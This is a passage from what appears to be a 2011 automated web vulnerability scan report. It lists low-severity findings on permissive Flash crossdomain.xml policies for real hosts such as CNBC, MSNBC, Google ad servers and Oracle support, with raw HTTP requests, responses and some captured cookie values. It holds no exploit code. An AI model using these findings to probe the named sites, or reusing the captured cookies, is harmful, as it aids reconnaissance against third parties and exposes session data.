Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: SESS93eea98f293ea8fd633599e480cddfdc=u6gvdrmr9fm9tr67nrb374c6c3; path=/; domain=.cnbc.com
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/xml
Via: 1.1 aicache6
Content-Length: 255
X-Aicache-OS: 64.210.193.252:80
Connection: Keep-Alive
Keep-Alive: max=20

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="m.cnbc.com" />
<allow-access-from domain="*.m.cnbc.com" />
...[SNIP]...

4.97. http://media.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.cnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1168
Date: Tue, 06 Sep 2011 14:56:31 GMT
Connection: close
Cache-Control: public, max-age=900

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.msnbc.com" />
   <allow-access-from domain="*.msn.com" />
   <allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="*.fluid.nl" />
   <allow-access-from domain="64.207.156.207" />
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
   <allow-access-from domain="*.pulse360.com" />
   <allow-access-from domain="*.context3.kanoodle.com" />
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.98. http://msnbcmedia.msn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msnbcmedia.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: msnbcmedia.msn.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:37 GMT
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Content-Type: text/xml
ETag: "0ff4d5ae31fcc1:0"
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1168
Connection: close

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.msnbc.com" />
   <allow-access-from domain="*.msn.com" />
   <allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="*.fluid.nl" />
   <allow-access-from domain="64.207.156.207" />
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
   <allow-access-from domain="*.pulse360.com" />
   <allow-access-from domain="*.context3.kanoodle.com" />
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.99. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:05 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

4.100. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Tue, 06 Sep 2011 00:01:39 GMT
Expires: Wed, 07 Sep 2011 00:01:39 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 53954
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.101. http://pi.pardot.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pi.pardot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pi.pardot.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:03 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 16:22:18 GMT
ETag: "e5"
Accept-Ranges: bytes
Content-Length: 229
Cache-Control: max-age=63072000
Expires: Thu, 05 Sep 2013 15:32:03 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/xml
X-Pardot-LB: lb-d2
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pardot.com" />
<allow-access-from domain="*.visual.force.com" />
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...

4.102. http://quote.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://quote.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: quote.cnbc.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 06 Sep 2011 14:56:38 GMT
Via: 1.1 C aicache6
Content-Length: 245
X-Aicache-OS: 64.210.195.136:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Wed, 07 Sep 2011 14:56:39 GMT

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.103. http://rd.rlcdn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rd.rlcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.rlcdn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 500
Last-Modified: Mon, 05 Sep 2011 19:31:28 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.casualcollective.com" />
<allow-access-from domain="*.tubemogul.com" />
<allow-access-from domain="*.inplay.tubemogul.com" />
<allow-access-from domain="*.grooveshark.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adotube.com" />
...[SNIP]...

4.104. http://search.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:01 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Mon, 18 Oct 2010 20:53:56 GMT
ETag: "f5-492ea5fe9c100"
Accept-Ranges: bytes
Content-Type: application/xml
Via: 1.1 aicache6
Content-Length: 245
X-Aicache-OS: 64.210.194.246:80
Connection: Keep-Alive
Keep-Alive: max=20

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.105. http://server.iad.liveperson.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:100b"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

4.106. http://snas.nbcuni.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: snas.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
Last-Modified: Fri, 17 Dec 2010 18:25:22 GMT
ETag: "2c9cd-58b-4979f4b136880"
Accept-Ranges: bytes
Content-Length: 1419
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:00:39 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*.ivillage.com" /><allow-access-from domain="*.nbbcdev.com" /><allow-access-from domain="*.bravotv.com" /><allow-access-from domain="*.console.net" /><allow-access-from domain="*.digphilly.com"/><allow-access-from domain="*.nbc10rss.com"/><allow-access-from domain="*.nbc10.com"/><allow-access-from domain="*.scifi.com"/><allow-access-from domain="*.weatherplus.com" /><allow-access-from domain="*.nbcuxd.com" /><allow-access-from domain="vplayer-preview-dev.nbcuni.ge.com" /><allow-access-from domain="*.industrynext.com"/><allow-access-from domain="*.nbcuni.com"/><allow-access-from domain="widgets.nbcuni.com"/><allow-access-from domain="*.nbc.com"/><allow-access-from domain="*.thetonightshowwithconan.com"/><allow-access-from domain="*.tonightshowwithconanobrien.com"/><allow-access-from domain="*.thetonightshowwithconanobrien.com"/><allow-access-from domain="*.tonightshow.com" /><allow-access-from domain="*.tonightshowwithconan.com" /><allow-access-from domain="*.latenightwithjimmyfallon.com" /><allow-access-from domain="*.ingaylewetrust.com" /><allow-access-from domain="*.thejaylenoshow.com" /><allow-access-from domain="127.0.0.1"/><allow-access-from domain="localhost"/><allow-access-from domain="*.sudjam.com"/>
...[SNIP]...

4.107. https://support.oracle.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: support.oracle.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:15 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Sat, 13 Aug 2011 04:17:35 GMT
ETag: "1827ecc-f6-4aa5b4f3d35c0"
Accept-Ranges: bytes
Content-Length: 246
Vary: Accept-Encoding
Cache-Control: no-store,max-age=0,must-revalidate
Keep-Alive: timeout=15, max=1799
Connection: close
Content-Type: application/xml
Content-Language: en

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.oracle.com" secure="true" />
<allow-http-request-headers-from domain="*.oracle.com" secure="true" headers="ORA_MOS_LOC
...[SNIP]...

4.108. http://symlookup.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://symlookup.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: symlookup.cnbc.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339024957; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.27
Content-Type: application/xml
Content-Length: 299
X-Aicache-OS: 64.210.193.218:80
Expires: Tue, 06 Sep 2011 15:02:33 GMT
Date: Tue, 06 Sep 2011 14:57:09 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://stage.ticker.cnbc.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.109. http://videometa.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://videometa.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: videometa.cnbc.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.27
Content-Type: application/xml
Content-Length: 462
X-Aicache-OS: 64.210.193.215:80
Cache-Control: max-age=600
Expires: Tue, 06 Sep 2011 15:06:36 GMT
Date: Tue, 06 Sep 2011 14:56:36 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="video.nbcuni.com" />
<allow-access-from domain="*.video.nbcuni.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="*.widgets.nbcuni.com" />
...[SNIP]...

4.110. http://w.sharethis.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Accept-Ranges: bytes
Date: Tue, 06 Sep 2011 16:46:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.111. http://wd.sharethis.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: wd.sharethis.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 15:32:10 GMT
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.112. http://www.apture.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apture.com

Response

HTTP/1.0 200 OK
Last-Modified: Sat, 03 Sep 2011 01:16:29 GMT
Content-Length: 366
Content-Type: text/xml
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:33:01 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.apture.com" />
<allow-access-from domain="*.sharlinx.com" />
<allow-access-from domain="apture.com" />
<allow-access-from domain="sharlinx.com" />
...[SNIP]...

4.113. http://www.atg.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.atg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.atg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 19 Jul 2010 15:33:33 GMT
ETag: "6009a-128-48bbf4a92ed40"
Pragma: no-cache
Content-Type: text/xml
Cache-Control: private, no-cache, no-store, no-transform, proxy-revalidate
Date: Tue, 06 Sep 2011 15:32:21 GMT
Content-Length: 296
Connection: close

<?xml version="1.0" ?>
<!-- http://www.atg.com/crossdomain.xml -->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.atg.com"/>
<
...[SNIP]...

4.114. https://www.atg.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.atg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.atg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 19 Jul 2010 15:33:33 GMT
ETag: "6009a-128-48bbf4a92ed40"
Pragma: no-cache
Content-Type: text/xml
Cache-Control: private, no-cache, no-store, no-transform, proxy-revalidate
Date: Tue, 06 Sep 2011 15:37:32 GMT
Content-Length: 296
Connection: close

<?xml version="1.0" ?>
<!-- http://www.atg.com/crossdomain.xml -->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.atg.com"/>
<
...[SNIP]...

4.115. http://www.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /crossdomain.xml

